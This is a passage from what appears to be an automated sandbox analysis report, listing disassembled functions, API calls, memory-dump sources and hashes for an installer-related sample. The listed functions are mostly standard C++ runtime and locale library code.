                                                                                                                                            • Associated: 00000004.00000002.2138375525.0000000000337000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000004.00000002.2138409196.000000000034C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000004.00000002.2138428517.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_4_2_2f0000_MSI8F42.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Registermessages
                                                                                                                                            • String ID: 21
                                                                                                                                            • API String ID: 2750803064-1316489359
                                                                                                                                            • Opcode ID: 726d228271270d3db82a596bf42cd3ac0b17ae8118e8dfd509b2e678ecf0d34f
                                                                                                                                            • Instruction ID: c84c39d679e8ab44b497c61b5d437202b95ff197793f9f330f83ad8327087451
                                                                                                                                            • Opcode Fuzzy Hash: 726d228271270d3db82a596bf42cd3ac0b17ae8118e8dfd509b2e678ecf0d34f
                                                                                                                                            • Instruction Fuzzy Hash: 8F018035A011199BCF1BEBA4D861ABEB7A5BF84710F25090AE514AF2D1CF749E01CB91
                                                                                                                                            Function 00302961 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 49COMMONLIBRARYCODE
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • __EH_prolog3.LIBCMT ref: 00302968
                                                                                                                                            • std::_Lockit::_Lockit.LIBCPMT ref: 00302972
                                                                                                                                              • Part of subcall function 002F8C20: std::_Lockit::_Lockit.LIBCPMT ref: 002F8C50
                                                                                                                                              • Part of subcall function 002F8C20: std::_Lockit::~_Lockit.LIBCPMT ref: 002F8C78
                                                                                                                                            • moneypunct.LIBCPMT ref: 003029AC
                                                                                                                                            • std::_Facet_Register.LIBCPMT ref: 003029C3
                                                                                                                                            • std::_Lockit::~_Lockit.LIBCPMT ref: 003029E3
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000004.00000002.2138298368.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true
                                                                                                                                            • Associated: 00000004.00000002.2138147487.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000004.00000002.2138375525.0000000000337000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000004.00000002.2138409196.000000000034C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000004.00000002.2138428517.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_4_2_2f0000_MSI8F42.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Registermoneypunct
                                                                                                                                            • String ID: 21
                                                                                                                                            • API String ID: 419941038-1316489359
                                                                                                                                            • Opcode ID: 6928773505a65cf59c3ac36001616d7798a8f027eb240fe68ed619afaf0a0d7c
                                                                                                                                            • Instruction ID: 260585e8307fa77278aaefb2824b6e8ca7c5d8c2316b858a23fb4d435f705531
                                                                                                                                            • Opcode Fuzzy Hash: 6928773505a65cf59c3ac36001616d7798a8f027eb240fe68ed619afaf0a0d7c
                                                                                                                                            • Instruction Fuzzy Hash: CA01D275902119DBCF0BEB64C866BBEB7B5AF88710F250909F510AF2D2CF709E018B91
                                                                                                                                            Function 003029F6 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 49COMMONLIBRARYCODE
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • __EH_prolog3.LIBCMT ref: 003029FD
                                                                                                                                            • std::_Lockit::_Lockit.LIBCPMT ref: 00302A07
                                                                                                                                              • Part of subcall function 002F8C20: std::_Lockit::_Lockit.LIBCPMT ref: 002F8C50
                                                                                                                                              • Part of subcall function 002F8C20: std::_Lockit::~_Lockit.LIBCPMT ref: 002F8C78
                                                                                                                                            • moneypunct.LIBCPMT ref: 00302A41
                                                                                                                                            • std::_Facet_Register.LIBCPMT ref: 00302A58
                                                                                                                                            • std::_Lockit::~_Lockit.LIBCPMT ref: 00302A78
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000004.00000002.2138298368.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true
                                                                                                                                            • Associated: 00000004.00000002.2138147487.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000004.00000002.2138375525.0000000000337000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000004.00000002.2138409196.000000000034C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000004.00000002.2138428517.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_4_2_2f0000_MSI8F42.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Registermoneypunct
                                                                                                                                            • String ID: 21
                                                                                                                                            • API String ID: 419941038-1316489359
                                                                                                                                            • Opcode ID: 9f9e49899abc734ac2a89e1034d5a0b4dd8580bbabe74e3811080a9ddd551e04
                                                                                                                                            • Instruction ID: fb1655c56a8204409fd47e8987b0815467abff498a6a0f4a2b573ec519d6f0b2
                                                                                                                                            • Opcode Fuzzy Hash: 9f9e49899abc734ac2a89e1034d5a0b4dd8580bbabe74e3811080a9ddd551e04
                                                                                                                                            • Instruction Fuzzy Hash: EE01C035901119DBCB1BEB64C865BBFB7A5AF88710F250909F900AF2D1CF309E418B91
                                                                                                                                            Function 0030EA97 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 49COMMONLIBRARYCODE
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • __EH_prolog3.LIBCMT ref: 0030EA9E
                                                                                                                                            • std::_Lockit::_Lockit.LIBCPMT ref: 0030EAA8
                                                                                                                                              • Part of subcall function 002F8C20: std::_Lockit::_Lockit.LIBCPMT ref: 002F8C50
                                                                                                                                              • Part of subcall function 002F8C20: std::_Lockit::~_Lockit.LIBCPMT ref: 002F8C78
                                                                                                                                            • moneypunct.LIBCPMT ref: 0030EAE2
                                                                                                                                            • std::_Facet_Register.LIBCPMT ref: 0030EAF9
                                                                                                                                            • std::_Lockit::~_Lockit.LIBCPMT ref: 0030EB19
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000004.00000002.2138298368.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true
                                                                                                                                            • Associated: 00000004.00000002.2138147487.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000004.00000002.2138375525.0000000000337000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000004.00000002.2138409196.000000000034C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000004.00000002.2138428517.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_4_2_2f0000_MSI8F42.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Registermoneypunct
                                                                                                                                            • String ID: 21
                                                                                                                                            • API String ID: 419941038-1316489359
                                                                                                                                            • Opcode ID: 4e0dcb4da84c1e360e34cc02470c11bb7c8397546a3cec105ff9b11291da764c
                                                                                                                                            • Instruction ID: f4100209c9368da5c3fa0c1f17f62eb48419e54faadc53da02d3d40f427c3093
                                                                                                                                            • Opcode Fuzzy Hash: 4e0dcb4da84c1e360e34cc02470c11bb7c8397546a3cec105ff9b11291da764c
                                                                                                                                            • Instruction Fuzzy Hash: 7401D235A01119DBCB1BEB64D861ABEB7B5BF84720F260809F405AF2D2CF309E01CB91
                                                                                                                                            Function 00302A8B Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 49COMMONLIBRARYCODE
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • __EH_prolog3.LIBCMT ref: 00302A92
                                                                                                                                            • std::_Lockit::_Lockit.LIBCPMT ref: 00302A9C
                                                                                                                                              • Part of subcall function 002F8C20: std::_Lockit::_Lockit.LIBCPMT ref: 002F8C50
                                                                                                                                              • Part of subcall function 002F8C20: std::_Lockit::~_Lockit.LIBCPMT ref: 002F8C78
                                                                                                                                            • moneypunct.LIBCPMT ref: 00302AD6
                                                                                                                                            • std::_Facet_Register.LIBCPMT ref: 00302AED
                                                                                                                                            • std::_Lockit::~_Lockit.LIBCPMT ref: 00302B0D
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000004.00000002.2138298368.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true
                                                                                                                                            • Associated: 00000004.00000002.2138147487.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000004.00000002.2138375525.0000000000337000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000004.00000002.2138409196.000000000034C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000004.00000002.2138428517.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_4_2_2f0000_MSI8F42.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Registermoneypunct
                                                                                                                                            • String ID: 21
                                                                                                                                            • API String ID: 419941038-1316489359
                                                                                                                                            • Opcode ID: c0a73cfb9b5cbec362c2528db2a7fc10b0dc235d42f2cc4649b77d2470cee8c3
                                                                                                                                            • Instruction ID: d1b7e60708ecc33ad6bb12c769fff595752a894e50be6e504e5eaeaf7c794c7d
                                                                                                                                            • Opcode Fuzzy Hash: c0a73cfb9b5cbec362c2528db2a7fc10b0dc235d42f2cc4649b77d2470cee8c3
                                                                                                                                            • Instruction Fuzzy Hash: B701C4359012199FCB1BEB64D865BBEB765AF84710F250909E500AF2D2CF709E01CB91
                                                                                                                                            Function 00302B20 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 49COMMONLIBRARYCODE
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • __EH_prolog3.LIBCMT ref: 00302B27
                                                                                                                                            • std::_Lockit::_Lockit.LIBCPMT ref: 00302B31
                                                                                                                                              • Part of subcall function 002F8C20: std::_Lockit::_Lockit.LIBCPMT ref: 002F8C50
                                                                                                                                              • Part of subcall function 002F8C20: std::_Lockit::~_Lockit.LIBCPMT ref: 002F8C78
                                                                                                                                            • moneypunct.LIBCPMT ref: 00302B6B
                                                                                                                                            • std::_Facet_Register.LIBCPMT ref: 00302B82
                                                                                                                                            • std::_Lockit::~_Lockit.LIBCPMT ref: 00302BA2
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000004.00000002.2138298368.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true
                                                                                                                                            • Associated: 00000004.00000002.2138147487.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000004.00000002.2138375525.0000000000337000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000004.00000002.2138409196.000000000034C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000004.00000002.2138428517.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_4_2_2f0000_MSI8F42.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Registermoneypunct
                                                                                                                                            • String ID: 21
                                                                                                                                            • API String ID: 419941038-1316489359
                                                                                                                                            • Opcode ID: ad59a016b07a7e84a12f87a051914e72d64e9acd701b55cffd1022ddcd1b94cb
                                                                                                                                            • Instruction ID: 255b8d317190ac6feae657a1e082e19af64edec7b52b69bb0711f2d209e00a58
                                                                                                                                            • Opcode Fuzzy Hash: ad59a016b07a7e84a12f87a051914e72d64e9acd701b55cffd1022ddcd1b94cb
                                                                                                                                            • Instruction Fuzzy Hash: 4B01C035901219DBCF1BEB64C865ABEB7B5AF84720F250409E500AF2D1CF309E418B91
                                                                                                                                            Function 0030EB2C Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 49COMMONLIBRARYCODE
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • __EH_prolog3.LIBCMT ref: 0030EB33
                                                                                                                                            • std::_Lockit::_Lockit.LIBCPMT ref: 0030EB3D
                                                                                                                                              • Part of subcall function 002F8C20: std::_Lockit::_Lockit.LIBCPMT ref: 002F8C50
                                                                                                                                              • Part of subcall function 002F8C20: std::_Lockit::~_Lockit.LIBCPMT ref: 002F8C78
                                                                                                                                            • moneypunct.LIBCPMT ref: 0030EB77
                                                                                                                                            • std::_Facet_Register.LIBCPMT ref: 0030EB8E
                                                                                                                                            • std::_Lockit::~_Lockit.LIBCPMT ref: 0030EBAE
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000004.00000002.2138298368.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true
                                                                                                                                            • Associated: 00000004.00000002.2138147487.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000004.00000002.2138375525.0000000000337000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000004.00000002.2138409196.000000000034C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000004.00000002.2138428517.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_4_2_2f0000_MSI8F42.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Registermoneypunct
                                                                                                                                            • String ID: 21
                                                                                                                                            • API String ID: 419941038-1316489359
                                                                                                                                            • Opcode ID: bb9a78034ab3654dae3ec57337f56c39ddedd9e19f19ac250bcfdd326bf21394
                                                                                                                                            • Instruction ID: 701ffda655d79d1c6d626cd22d31fad3e01f2fdbaca3f4d1c88cfcef401830b7
                                                                                                                                            • Opcode Fuzzy Hash: bb9a78034ab3654dae3ec57337f56c39ddedd9e19f19ac250bcfdd326bf21394
                                                                                                                                            • Instruction Fuzzy Hash: 6801C035901119DFCB1BEB60D8A1BBEB7A4BF84710F25080AE411AF2D1CF709E018B91
                                                                                                                                            Function 00302D74 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 49COMMONLIBRARYCODE
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • __EH_prolog3.LIBCMT ref: 00302D7B
                                                                                                                                            • std::_Lockit::_Lockit.LIBCPMT ref: 00302D85
                                                                                                                                              • Part of subcall function 002F8C20: std::_Lockit::_Lockit.LIBCPMT ref: 002F8C50
                                                                                                                                              • Part of subcall function 002F8C20: std::_Lockit::~_Lockit.LIBCPMT ref: 002F8C78
                                                                                                                                            • numpunct.LIBCPMT ref: 00302DBF
                                                                                                                                            • std::_Facet_Register.LIBCPMT ref: 00302DD6
                                                                                                                                            • std::_Lockit::~_Lockit.LIBCPMT ref: 00302DF6
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000004.00000002.2138298368.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true
                                                                                                                                            • Associated: 00000004.00000002.2138147487.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000004.00000002.2138375525.0000000000337000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000004.00000002.2138409196.000000000034C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000004.00000002.2138428517.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_4_2_2f0000_MSI8F42.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Registernumpunct
                                                                                                                                            • String ID: 21
                                                                                                                                            • API String ID: 743221004-1316489359
                                                                                                                                            • Opcode ID: e0f9b094edec0211dcde84b7e2cffe8529c82d7867ba314c0091f0465a863c11
                                                                                                                                            • Instruction ID: c7f2d7ee34f60ad5246ee5010d338b820304fddc85ddada0b6ffb51ef7e43cac
                                                                                                                                            • Opcode Fuzzy Hash: e0f9b094edec0211dcde84b7e2cffe8529c82d7867ba314c0091f0465a863c11
                                                                                                                                            • Instruction Fuzzy Hash: F101C0359022199BCB0BEBA0D865ABEB7A4BF84710F250809F510AF2D1CF709E41CB91
                                                                                                                                            Function 00322DEE Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 42libraryloaderCOMMONLIBRARYCODE
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,7642E7B1,0000000C,?,00000000,00336A6C,000000FF,?,00322DC1,?,?,00322D95,?), ref: 00322E23
                                                                                                                                            • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00322E35
                                                                                                                                            • FreeLibrary.KERNEL32(00000000,?,00000000,00336A6C,000000FF,?,00322DC1,?,?,00322D95,?), ref: 00322E57
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000004.00000002.2138298368.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true
                                                                                                                                            • Associated: 00000004.00000002.2138147487.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000004.00000002.2138375525.0000000000337000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000004.00000002.2138409196.000000000034C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000004.00000002.2138428517.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_4_2_2f0000_MSI8F42.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                                                            • String ID: 21$CorExitProcess$mscoree.dll
                                                                                                                                            • API String ID: 4061214504-3298179839
                                                                                                                                            • Opcode ID: 74a76b6f31c7100fdb94ae90c0412a41eb6e17c260faab31e41abc4d1c39cc14
                                                                                                                                            • Instruction ID: 6b59a07c7ef38cc14db08190f56c837d899b18254446da93772deb28a47a6d13
                                                                                                                                            • Opcode Fuzzy Hash: 74a76b6f31c7100fdb94ae90c0412a41eb6e17c260faab31e41abc4d1c39cc14
                                                                                                                                            • Instruction Fuzzy Hash: 8B016272918629BFDB239F50DC45FAFBBBCFB04B11F054525F811A22A0DB749900CA90
                                                                                                                                            Function 00312C4E Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 37COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • EnterCriticalSection.KERNEL32(0034DD3C,?,?,002F2427,0034E638,00336B40), ref: 00312C58
                                                                                                                                            • LeaveCriticalSection.KERNEL32(0034DD3C,?,?,002F2427,0034E638,00336B40), ref: 00312C8B
                                                                                                                                            • RtlWakeAllConditionVariable.NTDLL ref: 00312D02
                                                                                                                                            • SetEvent.KERNEL32(?,002F2427,0034E638,00336B40), ref: 00312D0C
                                                                                                                                            • ResetEvent.KERNEL32(?,002F2427,0034E638,00336B40), ref: 00312D18
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000004.00000002.2138298368.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true
                                                                                                                                            • Associated: 00000004.00000002.2138147487.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000004.00000002.2138375525.0000000000337000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000004.00000002.2138409196.000000000034C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000004.00000002.2138428517.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_4_2_2f0000_MSI8F42.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: CriticalEventSection$ConditionEnterLeaveResetVariableWake
                                                                                                                                            • String ID: 21
                                                                                                                                            • API String ID: 3916383385-1316489359
                                                                                                                                            • Opcode ID: c0ef14470f34ab86aa3be9cb61532f2f80b44889a3051b6c789ed4e7d9f5710d
                                                                                                                                            • Instruction ID: 00f2c937b9ef2eed273d3feacce5aa9a63ad56c92a8a076e1c221facab09dbd8
                                                                                                                                            • Opcode Fuzzy Hash: c0ef14470f34ab86aa3be9cb61532f2f80b44889a3051b6c789ed4e7d9f5710d
                                                                                                                                            • Instruction Fuzzy Hash: 5401E479905124DFC767AF18FC88A997BA9FF4A751F010469F9028B620CB31A951DA90
                                                                                                                                            Function 002FB500 Relevance: 9.2, APIs: 6, Instructions: 151memoryCOMMONLIBRARYCODE
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • std::_Lockit::_Lockit.LIBCPMT ref: 002FB531
                                                                                                                                            • std::_Lockit::_Lockit.LIBCPMT ref: 002FB54F
                                                                                                                                            • std::_Lockit::~_Lockit.LIBCPMT ref: 002FB577
                                                                                                                                            • LocalAlloc.KERNEL32(00000040,0000000C,00000000,7642E7B1,?,00000000,00000000), ref: 002FB5CF
                                                                                                                                            • std::_Facet_Register.LIBCPMT ref: 002FB6B7
                                                                                                                                            • std::_Lockit::~_Lockit.LIBCPMT ref: 002FB6E1
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000004.00000002.2138298368.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true
                                                                                                                                            • Associated: 00000004.00000002.2138147487.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000004.00000002.2138375525.0000000000337000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000004.00000002.2138409196.000000000034C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000004.00000002.2138428517.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_4_2_2f0000_MSI8F42.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: std::_$Lockit$Lockit::_Lockit::~_$AllocFacet_LocalRegister
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 3931714976-0
                                                                                                                                            • Opcode ID: b1d36c964ba34329dd8b7b13b55065936520e35d65858c89e35f0b0cc7d8417f
                                                                                                                                            • Instruction ID: daec4f949b98e37815d57754b7f27c88c6fe07f0c2885fedb0d7270c84c5ea8a
                                                                                                                                            • Opcode Fuzzy Hash: b1d36c964ba34329dd8b7b13b55065936520e35d65858c89e35f0b0cc7d8417f
                                                                                                                                            • Instruction Fuzzy Hash: 8A51CFB4900219DFDB17CF58C8907AEFBB8FF14354F244169E915AB391DBB5AA04CB81
                                                                                                                                            Function 002FB700 Relevance: 9.1, APIs: 6, Instructions: 128memoryCOMMONLIBRARYCODE
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • std::_Lockit::_Lockit.LIBCPMT ref: 002FB731
                                                                                                                                            • std::_Lockit::_Lockit.LIBCPMT ref: 002FB74F
                                                                                                                                            • std::_Lockit::~_Lockit.LIBCPMT ref: 002FB777
                                                                                                                                            • LocalAlloc.KERNEL32(00000040,00000008,00000000,7642E7B1,?,00000000,00000000), ref: 002FB7CF
                                                                                                                                            • std::_Facet_Register.LIBCPMT ref: 002FB863
                                                                                                                                            • std::_Lockit::~_Lockit.LIBCPMT ref: 002FB88D
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000004.00000002.2138298368.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true
                                                                                                                                            • Associated: 00000004.00000002.2138147487.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000004.00000002.2138375525.0000000000337000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000004.00000002.2138409196.000000000034C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000004.00000002.2138428517.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_4_2_2f0000_MSI8F42.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: std::_$Lockit$Lockit::_Lockit::~_$AllocFacet_LocalRegister
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 3931714976-0
                                                                                                                                            • Opcode ID: 510499c075a781fe505cb844f3ed8c6266f9419bdebbb04c8c7c281863015220
                                                                                                                                            • Instruction ID: 526754ad4716724d93398cc8945ee3b6c26bd3be49620e9bd5e0dce7cc52f5e1
                                                                                                                                            • Opcode Fuzzy Hash: 510499c075a781fe505cb844f3ed8c6266f9419bdebbb04c8c7c281863015220
                                                                                                                                            • Instruction Fuzzy Hash: 0351BF75915219DFDB16DF58C890BAEFBB8FB54390F24816DE911AB381DB74AE00CB80
                                                                                                                                            Function 00320351 Relevance: 9.1, APIs: 3, Strings: 2, Instructions: 369COMMONLIBRARYCODE
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000004.00000002.2138298368.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true
                                                                                                                                            • Associated: 00000004.00000002.2138147487.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000004.00000002.2138375525.0000000000337000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000004.00000002.2138409196.000000000034C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000004.00000002.2138428517.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_4_2_2f0000_MSI8F42.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: __freea$__alloca_probe_16
                                                                                                                                            • String ID: a/p$am/pm
                                                                                                                                            • API String ID: 3509577899-3206640213
                                                                                                                                            • Opcode ID: 782d96ac356fd7ca76b7ae68e4ccea5aaaed6fa5690390dd42e98147067aa576
                                                                                                                                            • Instruction ID: 270f6edf0ea9f47c3011c4a77348c91d8f6f9ffca864f97cae1aedec28cfc445
                                                                                                                                            • Opcode Fuzzy Hash: 782d96ac356fd7ca76b7ae68e4ccea5aaaed6fa5690390dd42e98147067aa576
                                                                                                                                            • Instruction Fuzzy Hash: A7C10434900226DBCB2EDF6CE989ABEB7B4FF05700F254049E545ABA52D335AC49CF91
                                                                                                                                            Function 002F5890 Relevance: 9.1, APIs: 1, Strings: 5, Instructions: 60COMMON
                                                                                                                                            Download Yara Rule
                                                                                                                                            APIs
                                                                                                                                            • GetLastError.KERNEL32(00000000,?,?,76C14450,002F5646,?,?,?,?,?), ref: 002F5898
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000004.00000002.2138298368.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true
                                                                                                                                            • Associated: 00000004.00000002.2138147487.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000004.00000002.2138375525.0000000000337000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000004.00000002.2138409196.000000000034C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            • Associated: 00000004.00000002.2138428517.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_4_2_2f0000_MSI8F42.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: ErrorLast
                                                                                                                                            • String ID: <S4$Call to ShellExecuteEx() returned:$Last error=$false$true
                                                                                                                                            • API String ID: 1452528299-3792586147
                                                                                                                                            • Opcode ID: 1bd93e787f5ec5155a8590ebf47cef9d413cb4c690577584198bda05d19f006d
                                                                                                                                            • Instruction ID: 645add698681bf60276405aae0057b098106224b9a458bd7ebb8998d8f91c4dd
